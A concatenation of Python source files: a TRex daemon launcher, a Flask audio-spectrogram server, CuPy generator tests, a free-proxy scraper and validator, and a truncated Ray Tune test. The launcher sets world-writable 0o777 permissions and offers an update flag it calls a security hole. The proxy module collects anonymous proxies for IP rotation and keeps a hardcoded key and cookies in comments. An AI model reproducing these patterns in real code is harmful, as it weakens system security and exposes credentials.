parser.add_argument('--stl-rpc-proxy-port', type=int, default = 8095, dest='stl_rpc_proxy_port',
help = 'Select port to which the Stateless RPC proxy will listen.\nDefault is 8095.', action = 'store')
parser.add_argument('-d', '--trex-dir', type=str, default = os.getcwd(), dest='trex_dir',
help = 'Path of TRex, default is current dir', action = 'store')
parser.add_argument('--allow-update', default = False, dest='allow_update', action = 'store_true',
help = "Allow update of TRex via RPC command. WARNING: It's security hole! Use on your risk!")
parser.add_argument('action', choices = daemon_actions,
action = 'store', help = actions_help)
parser.add_argument('--type', '--daemon-type', '--daemon_type', choices = daemons.keys(), dest = 'daemon_type',
action = 'store', help = 'Specify daemon type to start/stop etc.\nDefault is master_daemon.')
args = parser.parse_args()
args.trex_dir = os.path.abspath(args.trex_dir)
args.daemon_type = args.daemon_type or 'master_daemon'
stl_rpc_proxy_dir = os.path.join(args.trex_dir, 'automation', 'trex_control_plane', 'server')
stl_rpc_proxy = TCPDaemon('Stateless RPC proxy', args.stl_rpc_proxy_port, "su -s /bin/bash -c '%s rpc_proxy_server.py' nobody" % sys.executable, stl_rpc_proxy_dir)
trex_daemon_server = TCPDaemon('TRex daemon server', args.trex_daemon_port, '%s trex_daemon_server start' % sys.executable, args.trex_dir)
master_daemon = TCPDaemon('Master daemon', args.master_port, start_master_daemon) # add ourself for easier check if running, kill etc.
tmp_dir = '/tmp/trex-tmp'
logging_file = '/var/log/trex/master_daemon.log'
logging_file_bu = '/var/log/trex/master_daemon.log_bu'
os.chdir('/')
class CUpdate:
info = {}
thread = None
if not _check_path_under_current_or_temp(args.trex_dir):
raise Exception('Only allowed to use path under /tmp or current directory')
if os.path.isfile(args.trex_dir):
raise Exception('Given path is a file')
if not os.path.exists(args.trex_dir):
    print('Path %s does not exist, creating it and assuming TRex will be unpacked there.' % args.trex_dir)
os.makedirs(args.trex_dir)
os.chmod(args.trex_dir, 0o777)
elif args.allow_update:
print('Due to allow updates flag, setting mode 777 on given directory')
os.chmod(args.trex_dir, 0o777)
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
if args.daemon_type not in daemons.keys(): # not supposed to happen
    raise Exception('Error in daemon type, should be one of the following: %s' % daemons.keys())
daemon = vars().get(args.daemon_type)
if not daemon:
raise Exception('Daemon %s does not exist' % args.daemon_type)
if args.action != 'show':
func = getattr(daemon, args.action)
if not func:
raise Exception('%s does not have function %s' % (daemon.name, args.action))
try:
func()
except:
try: # give it another try
time.sleep(1)
func()
except Exception as e:
print(termstyle.red(e))
sys.exit(1)
passive = {'start': 'started', 'restart': 'restarted', 'stop': 'stopped', 'show': 'running'}
if (args.action in ('show', 'start', 'restart')) ^ (not daemon.is_running()):
print(termstyle.green('%s is %s' % (daemon.name, passive[args.action])))
sys.exit(0)
else:
print(termstyle.red('%s is NOT %s' % (daemon.name, passive[args.action])))
sys.exit(-1)
|
soundserver_threaded.py
|
import flask
import os
from os.path import join
import sys
import hemlib
try:
import simplejson as json
except:
import json
app = flask.Flask(__name__)
import pyaudio
from numpy import zeros, linspace, short, fromstring, hstack, transpose
from scipy import fft
HOST = "localhost"
PORT = 9294
NUM_SAMPLES = 1024
SAMPLING_RATE = 44100
MAX_FREQ = SAMPLING_RATE / 8
FREQ_SAMPLES = NUM_SAMPLES / 8
SPECTROGRAM_LENGTH = 400
# Maximum time we want to spend polling the microphone for a single request
MAX_REQ_TIME = 0.05
adata = 0
from threading import Thread, RLock
import numpy as np
mutex = RLock()
_stream = None
def get_audio_data():
global adata, _stream
if _stream is None:
pa = pyaudio.PyAudio()
_stream = pa.open(format=pyaudio.paInt16, channels=1, rate=SAMPLING_RATE,
input=True, frames_per_buffer=NUM_SAMPLES)
while True:
try:
audio_data = fromstring(_stream.read(NUM_SAMPLES), dtype=np.int16)
normalized_data = audio_data / 32768.0
with mutex:
adata = (abs(fft(normalized_data))[:NUM_SAMPLES/2], normalized_data)
except:
with mutex:
adata = 0
# def onTimer(self, *args):
# spectrum, time = get_audio_data()
# self.spectrum_data.set_data('amplitude', spectrum)
# self.time_data.set_data('amplitude', time)
# spectrogram_data = self.spectrogram_plotdata.get_data('imagedata')
# spectrogram_data = hstack((spectrogram_data[:,1:],
# transpose([spectrum])))
#SRCDIR = "../../static/coffee"
SRCDIR = "static/bokehjs_static/coffee"
EXAMPLE_SRCDIR = "static/coffee"
EXCLUDES = [join(SRCDIR,"demo"), join(SRCDIR,"unittest"),
join(SRCDIR,"unittest/primitives")]
@app.route("/")
def root():
""" Returns the spectrogram of audio data served from /data
"""
app.debug = True
if app.debug:
with open("slug.json") as f:
slug = json.load(f)
jslibs = hemlib.slug_libs(app, slug['libs'])
hemfiles = hemlib.coffee_assets(SRCDIR, HOST, PORT,
excludes=EXCLUDES)
else:
jslibs = ['/static/js/demo/application.js']
hemfiles = []
print "soundserver hemfiles", hemfiles
#demofiles = [os.path.join(EXAMPLE_SRCDIR,".coffee") for name in demos]
demofiles = ["static/coffee/spectrogram.coffee"]
for demo in demofiles:
if not os.path.isfile(demo):
raise RuntimeError("Cannot find demo named '%s'"%demo)
hemfiles.extend(hemlib.make_urls(demofiles, HOST, PORT))
return flask.render_template("spectrogram.html", jslibs = jslibs,
hemfiles=hemfiles, demos="basdf")
#return flask.render_template("spectrogram.html")
@app.route("/data")
def data():
""" Returns the current audio data sample as a JSON list of two
arrays of floating-point values: (fft values, audio sample values)
"""
global adata
to_send = None
#minimal work in mutex
with mutex:
if not adata:
return json.dumps({})
else:
to_send = adata
adata = None
if to_send:
return json.dumps([to_send[0].tolist(), to_send[1].tolist()])
def main():
""" Starts the sound server, which retains the audio data inside
its process space, and forks out workers when web connections are
made.
"""
t = Thread(target = get_audio_data, args = ())
    t.daemon = True
t.start()
app.debug = True
app.run()
if __name__ == "__main__":
main()
|
test_generator_api.py
|
import threading
import unittest
import pytest
import numpy
import cupy
from cupy import random
from cupy import testing
from cupy.testing import _condition
from cupy_tests.random_tests import common_distributions
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class GeneratorTestCase(common_distributions.BaseGeneratorTestCase):
target_method = None
def get_rng(self, xp, seed):
if xp is cupy:
return cupy.random._generator_api.Generator(
random._bit_generator.Philox4x3210(seed=seed))
else:
return numpy.random.Generator(numpy.random.MT19937(seed))
def set_rng_seed(self, seed):
self.rng.bit_generator = random._bit_generator.Philox4x3210(seed=seed)
class InvalidOutsMixin:
def invalid_dtype_out(self, **kwargs):
out = cupy.zeros((3, 2), dtype=cupy.float32)
with pytest.raises(TypeError):
self.generate(size=(3, 2), out=out, **kwargs)
def invalid_contiguity(self, **kwargs):
out = cupy.zeros((4, 6), dtype=cupy.float64)[0:3:, 0:2:]
with pytest.raises(ValueError):
self.generate(size=(3, 2), out=out, **kwargs)
def invalid_shape(self, **kwargs):
out = cupy.zeros((3, 3), dtype=cupy.float64)
with pytest.raises(ValueError):
self.generate(size=(3, 2), out=out, **kwargs)
def test_invalid_dtype_out(self):
self.invalid_dtype_out()
def test_invalid_contiguity(self):
self.invalid_contiguity()
def test_invalid_shape(self):
self.invalid_shape()
@testing.parameterize(*common_distributions.exponential_params)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestExponential(
common_distributions.Exponential,
GeneratorTestCase
):
pass
@testing.parameterize(*common_distributions.poisson_params)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestPoisson(
common_distributions.Poisson,
GeneratorTestCase
):
pass
@testing.parameterize(*common_distributions.beta_params)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestBeta(
common_distributions.Beta,
GeneratorTestCase
):
pass
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestStandardExponential(
InvalidOutsMixin,
common_distributions.StandardExponential,
GeneratorTestCase,
):
pass
@testing.parameterize(*common_distributions.gamma_params)
@testing.gpu
@testing.fix_random()
class TestGamma(
common_distributions.Gamma,
GeneratorTestCase,
):
pass
@testing.parameterize(*common_distributions.standard_gamma_params)
@testing.gpu
@testing.fix_random()
class TestStandardGamma(
common_distributions.StandardGamma,
GeneratorTestCase,
):
pass
@testing.gpu
@testing.fix_random()
class TestStandardGammaInvalid(InvalidOutsMixin, GeneratorTestCase):
target_method = 'standard_gamma'
def test_invalid_dtype_out(self):
self.invalid_dtype_out(shape=1.0)
def test_invalid_contiguity(self):
self.invalid_contiguity(shape=1.0)
out = cupy.zeros((4, 6), order='F', dtype=cupy.float64)
with pytest.raises(ValueError):
self.generate(size=(4, 6), out=out, shape=1.0)
def test_invalid_shape(self):
self.invalid_shape(shape=1.0)
def test_invalid_dtypes(self):
for dtype in 'bhiqleFD':
with pytest.raises(TypeError):
self.generate(size=(3, 2), shape=1.0, dtype=dtype)
@testing.gpu
@testing.fix_random()
class TestStandardGammaEmpty(GeneratorTestCase):
target_method = 'standard_gamma'
def test_empty_shape(self):
y = self.generate(shape=cupy.empty((1, 0)))
assert y.shape == (1, 0)
def test_empty_size(self):
y = self.generate(1.0, size=(1, 0))
assert y.shape == (1, 0)
def test_empty_out(self):
out = cupy.empty((1, 0))
y = self.generate(cupy.empty((1, 0)), out=out)
assert y is out
assert y.shape == (1, 0)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.parameterize(*common_distributions.standard_normal_params)
@testing.fix_random()
class TestStandardNormal(
common_distributions.StandardNormal,
GeneratorTestCase
):
pass
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestStandardNormalInvalid(InvalidOutsMixin, GeneratorTestCase):
target_method = 'standard_normal'
def test_invalid_dtypes(self):
for dtype in 'bhiqleFD':
with pytest.raises(TypeError):
self.generate(size=(3, 2), dtype=dtype)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestIntegers(GeneratorTestCase):
target_method = 'integers'
def test_integers_1(self):
self.generate(3)
def test_integers_2(self):
self.generate(3, 4, size=(3, 2))
def test_integers_empty1(self):
self.generate(3, 10, size=0)
def test_integers_empty2(self):
self.generate(3, size=(4, 0, 5))
def test_integers_overflow(self):
self.generate(numpy.int8(-100), numpy.int8(100))
def test_integers_float1(self):
self.generate(-1.2, 3.4, 5)
def test_integers_float2(self):
self.generate(6.7, size=(2, 3))
def test_integers_int64_1(self):
self.generate(2**34, 2**40, 3)
@_condition.repeat_with_success_at_least(10, 3)
def test_integers_ks(self):
self.check_ks(0.05)(
low=100, high=1000, size=2000)
@_condition.repeat_with_success_at_least(10, 3)
def test_integers_ks_low(self):
self.check_ks(0.05)(
low=100, size=2000)
@_condition.repeat_with_success_at_least(10, 3)
def test_integers_ks_large(self):
self.check_ks(0.05)(
low=2**34, high=2**40, size=2000)
@_condition.repeat_with_success_at_least(10, 3)
def test_integers_ks_large2(self):
self.check_ks(0.05)(
2**40, size=2000)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestRandom(InvalidOutsMixin, GeneratorTestCase):
# TODO(niboshi):
# Test soundness of distribution.
    # Currently only reproducibility is checked.
target_method = 'random'
def test_random(self):
self.generate(3)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_random_ks(self, dtype):
self.check_ks(0.05)(size=2000, dtype=dtype)
@testing.parameterize(*common_distributions.geometric_params)
@testing.with_requires('numpy>=1.17.0')
@testing.fix_random()
class TestGeometric(
common_distributions.Geometric,
GeneratorTestCase
):
pass
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestRandomStateThreadSafe(unittest.TestCase):
def test_default_rng_thread_safe(self):
def _f(func, args=()):
cupy.cuda.Device().use()
func(*args)
seed = 10
threads = [
threading.Thread(
target=_f, args=(cupy.random.default_rng, (seed,))),
            threading.Thread(target=_f, args=(cupy.random.default_rng,)),
            threading.Thread(target=_f, args=(cupy.random.default_rng,)),
            threading.Thread(target=_f, args=(cupy.random.default_rng,)),
            threading.Thread(target=_f, args=(cupy.random.default_rng,)),
            threading.Thread(target=_f, args=(cupy.random.default_rng,)),
            threading.Thread(target=_f, args=(cupy.random.default_rng,)),
]
for t in threads:
t.start()
for t in threads:
t.join()
actual = cupy.random.default_rng(seed).standard_exponential()
expected = cupy.random.default_rng(seed).standard_exponential()
assert actual == expected
|
IPUtilities.py
|
#!/usr/bin/python3.6
# -*- coding: UTF-8 -*-
# @author: guichuan
import requests
import os
from scrapy.selector import Selector
import pandas as pd
import numpy as np
import datetime
import random
import multiprocessing as mp
import time
import warnings
def crawl_xici_ip(item_count, fileName='xici_iplist.par'):
"""
爬取西刺item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_xici_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
count = 1
page_count = 0
ip_list = []
while count <= item_count:
response = requests.get(url='http://www.xicidaili.com/nn/{0}'.format(page_count + 1), headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('//*[@id="ip_list"]//tr')
for tr in all_trs[1:]:
ip = tr.xpath('td[2]/text()').extract_first()
port = tr.xpath('td[3]/text()').extract_first()
ip_type = tr.xpath('td[6]/text()').extract_first().lower()
ip_speed = tr.xpath('td[7]/div/@title').extract_first()
if ip_speed:
ip_speed = float(ip_speed.split(u'秒')[0])
ip_time = tr.xpath('td[10]/text()').extract_first()
ip_time = str(datetime.datetime.strptime('20' + ip_time, '%Y-%m-%d %H:%M'))
count += 1
ip_this = '{0}://{1}:{2}'.format(ip_type, ip, port)
status, _ = IPUtil.judge_ip(ip_this)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of xici.'.format(ip_type, ip, port, count))
ip_list.append((ip, port, ip_type, ip_speed, ip_time))
if count >= item_count:
break
else:
page_count += 1
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
def crawl_89_ip(item_count, fileName='89_iplist.par'):
"""
爬取89ip网站item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_89_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
count = 1
page_count = 0
ip_list = []
while count <= item_count:
response = requests.get(url='http://www.89ip.cn/index_{}.html'.format(page_count + 1), headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('//table[@class="layui-table"]//tbody//tr')
for tr in all_trs[0:]:
ip = tr.xpath('td[1]/text()').extract_first().strip()
port = tr.xpath('td[2]/text()').extract_first().strip()
ip_type = 'http'
ip_speed = np.nan
ip_time = tr.xpath('td[5]/text()').extract_first().strip()
ip_time = datetime.datetime.strptime(ip_time, '%Y/%m/%d %H:%M:%S')
count += 1
ip_this = '{0}://{1}:{2}'.format(ip_type, ip, port)
status, _ = IPUtil.judge_ip(ip_this, verbose=False)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of 89ip.'.format(ip_type, ip, port, count))
ip_list.append((ip, port, ip_type, ip_speed, ip_time))
if count >= item_count:
break
else:
if len(all_trs) == 0:
break
else:
page_count += 1
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
def crawl_kuaidaili_ip(item_count, fileName='kuaidaili_iplist.par'):
"""
爬取kuaidaili网站item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_kuaidaili_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
count = 1
page_count = 0
ip_list = []
while count <= item_count:
response = requests.get(url='https://www.kuaidaili.com/free/inha/{}/'.format(page_count + 1), headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('//table[@class="table table-bordered table-striped"]//tbody//tr')
for tr in all_trs[1:]:
ip = tr.xpath('td[1]/text()').extract_first().strip()
port = tr.xpath('td[2]/text()').extract_first().strip()
ip_type = 'http'
ip_speed = np.nan
ip_time = tr.xpath('td[7]/text()').extract_first().strip()
ip_time = datetime.datetime.strptime(ip_time, '%Y-%m-%d %H:%M:%S')
count += 1
ip_this = '{0}://{1}:{2}'.format(ip_type, ip, port)
status, _ = IPUtil.judge_ip(ip_this, verbose=False)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of kuaidaili.'.format(ip_type, ip, port, count))
ip_list.append((ip, port, ip_type, ip_speed, ip_time))
if count >= item_count:
break
else:
if len(all_trs) == 0:
break
else:
page_count += 1
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
def crawl_xiladaili_ip(item_count, fileName='xiladaili_iplist.par'):
"""
爬取xiladaili网站item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_xiladaili_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
count = 1
page_count = 0
ip_list = []
while count <= item_count:
response = requests.get(url='https://www.kuaidaili.com/free/inha/{}/'.format(page_count + 1), headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('//table[@class="table table-bordered table-striped"]//tbody//tr')
for tr in all_trs[1:]:
ip = tr.xpath('td[1]/text()').extract_first().strip()
port = tr.xpath('td[2]/text()').extract_first().strip()
ip_type = 'http'
ip_speed = np.nan
ip_time = tr.xpath('td[7]/text()').extract_first().strip()
ip_time = datetime.datetime.strptime(ip_time, '%Y-%m-%d %H:%M:%S')
count += 1
ip_this = '{0}://{1}:{2}'.format(ip_type, ip, port)
status, _ = IPUtil.judge_ip(ip_this, verbose=False)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of xiladaili.'.format(ip_type, ip, port, count))
ip_list.append((ip, port, ip_type, ip_speed, ip_time))
if count >= item_count:
break
else:
if len(all_trs) == 0:
break
else:
page_count += 1
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
def crawl_ip3366_ip(item_count, fileName='ip3366_iplist.par'):
"""
爬取89ip网站item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_ip3366_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
count = 1
page_count = 0
ip_list = []
while count <= item_count:
response = requests.get(url='http://www.ip3366.net/free/?stype=1&page={}'.format(page_count + 1),
headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('//table[@class="table table-bordered table-striped"]//tbody//tr')
for tr in all_trs:
ip = tr.xpath('td[1]/text()').extract_first().strip()
port = tr.xpath('td[2]/text()').extract_first().strip()
ip_type = tr.xpath('td[4]/text()').extract_first().strip().lower()
ip_speed = tr.xpath('td[6]/text()').extract_first().strip()
ip_time = tr.xpath('td[7]/text()').extract_first().strip()
ip_time = datetime.datetime.strptime(ip_time, '%Y/%m/%d %H:%M:%S')
count += 1
ip_this = '{0}://{1}:{2}'.format(ip_type, ip, port)
status, _ = IPUtil.judge_ip(ip_this, verbose=False)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of ip3366.'.format(ip_type, ip, port, count))
ip_list.append((ip, port, ip_type, ip_speed, ip_time))
if count >= item_count:
break
else:
if len(all_trs) == 0:
break
else:
page_count += 1
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
def crawl_66ip_ip(item_count, fileName='66ip_iplist.par'):
"""
爬取89ip网站item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_66ip_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
count = 1
ip_list = []
while count <= item_count:
response = requests.get(url='http://www.66ip.cn/nmtq.php?getnum=300&isp=0&anonymoustype=3'
'&start=&ports=&export=&ipaddress=&area=1&proxytype=0&api=66ip', headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('/html/body//text()').extract()
for item in all_trs:
count += 1
ip_this = item.strip()
try:
ip, port = ip_this.split(':')
except ValueError:
print(ip_this)
continue
status, _ = IPUtil.judge_ip(ip_this, verbose=False)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of 66ip.'.format('http', ip, port, count))
ip_list.append((ip, port, 'http', np.nan, np.nan))
if count >= item_count:
break
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
# def crawl_ihuan_ip(item_count, fileName='ihuan_iplist.par'):
# """
# 爬取89ip网站item_count个数量的ip,存为parquet格式
# :return:
# """
# print("\nCrawling_ihun_ip...")
# path = os.path.join(os.path.abspath(os.curdir))
# file_name = os.path.join(path, fileName)
#
# headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0",
# "Content-Type": "application/x-www-form-urlencoded",
# "Upgrade-Insecure-Requests": "1",
# "Host": "ip.ihuan.me",
# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
# "Accept-Language": "en-US,en;q=0.5",
# "Accept-Encoding": "gzip,deflate",
# "Referer": "https://ip.ihuan.me/ti.html",
# "Pragma": "no-cache",
# "Cache-Control": "no-cache"
# }
# data = {"anonymity": "2",
# "num": "3000",
# "sort": "1",
# "type": "0",
# "key": "f8abe06f9dcb96776b8c16d9eb5cc0a2"
# }
#
# cookie_dict = {
# "__cfduid": "d24ab976aab68fc34226818a648cafc611591800745",
# "Hm_lpvt_8ccd0ef22095c2eebfe4cd6187dea829": "1592974423",
# "Hm_lvt_8ccd0ef22095c2eebfe4cd6187dea829": "1591800750, 1592968177",
# "statistics": "8689a6d889b430723559d3e9ae450e00"}
# count = 1
# ip_list = []
# while count <= item_count:
# response = requests.post(url='https://ip.ihuan.me/tqdl.html', headers=headers, data=data, cookies=cookie_dict)
# time.sleep(0.05)
# all_trs = Selector(text=response.text).xpath('/html/body//text()').extract()
#
# for item in all_trs:
# count += 1
# ip_this = item.strip()
# ip, port = ip_this.split(':')
# status, _ = IPUtil.judge_ip(ip_this, verbose=False)
# if status:
# print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item'.format('http', ip, port, count))
# ip_list.append((ip, port, 'http', np.nan, np.nan))
#
# if count >= item_count:
# break
#
# df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
# df.to_parquet(file_name)
def crawl_ihuan_ip(item_count, fileName='ihuan_iplist.par'):
"""
爬取89ip网站item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_ihun_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
today = datetime.datetime.today()
today = datetime.datetime(today.year, today.month, today.day, today.hour)
count = 1
ip_list = []
finish_flag = False
while finish_flag is not True:
response = requests.post(url='https://ip.ihuan.me/today/{}/{:02d}/{:02d}/{:02d}.html'.
format(today.year, today.month, today.day, today.hour), headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('//p[@class="text-left"]//text()').extract()
for item in all_trs:
item = item.strip()
if item.split('@')[-1].split('#')[0] == 'HTTP' and item.split('@')[-1].split('#')[1][1:3] == "高匿":
count += 1
try:
ip_this = item.split('@')[0]
ip, port = ip_this.split(':')
except ValueError:
continue
status, _ = IPUtil.judge_ip(ip_this, verbose=False)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of ihuan.'.format('http', ip, port, count))
ip_list.append((ip, port, 'http', np.nan, np.nan))
if count >= item_count:
finish_flag = True
break
else:
continue
today = today - datetime.timedelta(hours=1)
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
class IPUtil(object):
# noinspection SqlDialectInspection
def __init__(self, sources: tuple = ('xici', '89ip', 'kuaidaili', 'xiladaili', '66ip', 'ip3366', 'ihuan')):
source_dict = {'xici': 'xici_iplist.par',
'89ip': '89_iplist.par',
'kuaidaili': 'kuaidaili_iplist.par',
'xiladaili': 'xiladaili_iplist.par',
'66ip': '66ip_iplist.par',
'ip3366': 'ip3366_iplist.par',
'ihuan': 'ihuan_iplist.par'
}
path = os.path.split(os.path.realpath(__file__))[0]
df_list = []
for source in sources:
try:
df_list.append(pd.read_parquet(os.path.join(path, source_dict[source])))
except Exception as err:
                print('source %s is missing! (%s)' % (source, err))
continue
df = pd.concat(df_list)
IP_POOL = list(zip(df['ip'].astype(str).tolist(),
df['port'].astype(str).tolist(),
df['type'].astype(str).tolist()))
ip_all = list(set(["{0}://{1}:{2}".format(ip_type, ip, port) for ip, port, ip_type in IP_POOL
if ip_type.lower() == 'http']))
pool = mp.Pool(processes=8)
connect_test_list_obj = [pool.apply_async(IPUtil.judge_ip, [item, 5]) for item in ip_all]
pool.close()
pool.join()
ip_all_checked = []
for item in connect_test_list_obj:
status, ip_result = item.get()
if status:
ip_all_checked.append(ip_result)
self.IP_POOL = ip_all_checked
print("\n>>>>> Get proxy IP list with length {}".format(len(self.IP_POOL)))
def random(self, check=False):
ip_random = random.choice(self.IP_POOL)
if check:
            # judge_ip returns a (status, url) tuple; check the status flag,
            # not the tuple itself (a non-empty tuple is always truthy).
            status, _ = IPUtil.judge_ip(ip_random, timeout=5)
            if status:
                return ip_random
            else:
                return self.random()
else:
return ip_random
def remove(self, ip):
self.IP_POOL.remove(ip)
@staticmethod
def judge_ip(proxy_url, timeout=10, verbose=False):
warnings.filterwarnings('ignore')
        # Check whether the proxy is usable: if the test URL can be fetched through
        # it with a 2xx status code and the expected page content, the proxy works.
http_url = "http://guba.eastmoney.com/news,600519,937492931_1.html"
try:
proxy_dict = {
"http": proxy_url,
}
requests.adapters.DEFAULT_RETRIES = 5
response = requests.get(http_url, proxies=proxy_dict, headers={'Connection': 'close'}, verify=False,
timeout=timeout)
test_string = Selector(text=response.text).xpath(
'/html/body/div[5]/div[3]/div[5]/div[1]/div[3]/div[1]/strong/a/font/text()').extract_first()
except Exception as err:
# print('>>>>> Check proxy : {}, Err: {}'.format(proxy_url, err))
return False, proxy_url
else:
code = response.status_code
if 200 <= code < 300 and test_string == 'Wan2':
if verbose:
print('>>>>> Check proxy : {}, return code: {}'.format(proxy_url, code))
return True, proxy_url
else:
return False, proxy_url
if __name__ == '__main__':
IPU = IPUtil()
print(IPU.random())
# func_pool = [crawl_xici_ip, crawl_89_ip, crawl_kuaidaili_ip, crawl_xiladaili_ip, crawl_ip3366_ip, crawl_66ip_ip, crawl_ihuan_ip]
# para = [1000, 750, 1000, 100, 1000, 300, 2000]
# iter_items = zip(func_pool, para)
#
# for func, item_count in iter_items:
# p = Process(target=func, args=(item_count,))
# p.start()
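# Hypothetical usage sketch (illustration only, not part of the original
# module): pick a random pre-validated proxy for a request and drop it from
# the pool if the request fails.
#
#     util = IPUtil(sources=('89ip', 'kuaidaili'))
#     proxy = util.random(check=True)
#     try:
#         resp = requests.get('http://example.com', proxies={'http': proxy}, timeout=10)
#     except requests.RequestException:
#         util.remove(proxy)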
|
test_tune_restore.py
|
# coding: utf-8
import signal
from collections import Counter
import multiprocessing
import os
import shutil
import tempfile
import threading
import time
from typing import List
import unittest
import ray
from ray import tune
from ray._private.test_utils import recursive_fnmatch
from ray.rllib import _register_all
from ray.tune.callback import Callback
from ray.tune.suggest.basic_variant import BasicVariantGenerator
from ray.tune.suggest import Searcher
from ray.tune.trial import Trial
from ray.tune.utils import validate_save_restore
from ray.tune.utils.mock_trainable import MyTrainableClass
class TuneRestoreTest(unittest.TestCase):
def setUp(self):
ray.init(num_cpus=1, num_gpus=0, local_mode=True)
tmpdir = tempfile.mkdtemp()
test_name = "TuneRestoreTest"
tune.run(
"PG",
name=test_name,
stop={"training_iteration": 1},
checkpoint_freq=1,
local_dir=tmpdir,
config={
"env": "CartPole-v0",
"framework": "tf",
},
)
logdir = os.path.expanduser(os.path.join(tmpdir, test_name))
self.logdir = logdir
self.checkpoint_path = recursive_fnmatch(logdir, "checkpoint-1")[0]
def tearDown(self):
shutil.rmtree(self.logdir)
ray.shutdown()
_register_all()
def testTuneRestore(self):
self.assertTrue(os.path.isfile(self.checkpoint_path))
tune.run(
"PG",
name="TuneRestoreTest",
stop={"training_iteration": 2}, # train one more iteration.
checkpoint_freq=1,
restore=self.checkpoint_path, # Restore the checkpoint
config={
"env": "CartPole-v0",
"framework": "tf",
},
)
def testPostRestoreCheckpointExistence(self):
"""Tests that checkpoint restored from is not deleted post-restore."""
self.assertTrue(os.path.isfile(self.checkpoint_path))
tune.run(
"PG",
name="TuneRestoreTest",
stop={"training_iteration": 2},
checkpoint_freq=1,
keep_checkpoints_num=1,
restore=self.checkpoint_path,
config={
"env": "CartPole-v0",
"framework": "tf",
},
)
self.assertTrue(os.path.isfile(self.checkpoint_path))
# Defining the callbacks at the file level, so they can be pickled and spawned
# in a separate process.
class SteppingCallback(Callback):
def __init__(self, driver_semaphore, trainer_semaphore):
self.driver_semaphore = driver_semaphore
self.trainer_semaphore = trainer_semaphore
def on_step_end(self, iteration, trials, **info):
